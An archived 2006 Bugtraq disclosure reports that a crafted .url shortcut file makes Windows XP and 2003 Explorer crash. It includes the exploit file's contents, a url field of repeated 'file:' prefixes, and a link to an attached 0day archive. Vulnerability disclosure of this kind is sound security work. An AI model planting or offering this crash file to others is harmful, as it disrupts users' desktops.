lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060705055352.5472.qmail@securityfocus.com> Date: 5 Jul 2006 05:53:52 -0000 From: nanika@...oot.org To: bugtraq@...urityfocus.com Subject: Windows Explorer URL File format overflow Windows Explorer URL File format overflow Affected Vendor: Microsoft Affected Products: WindowsXP ALL Windows2003 ALL Vulnerability Details: When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash. if you create the Exploit.url on Desktop Explorer will Crash...Crash...Crash...Crash...Crash...Crash... if you will del exploit.url open taskmgr.exe open cmd.exe then cd your desktop del exploit.url Exploit: [InternetShortcut] url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file: Attachment: http://hitcon.org/Nanika-desktop_explore_0day.rar you can drop in desktop :P http://hitcon.org http://www.chroot.org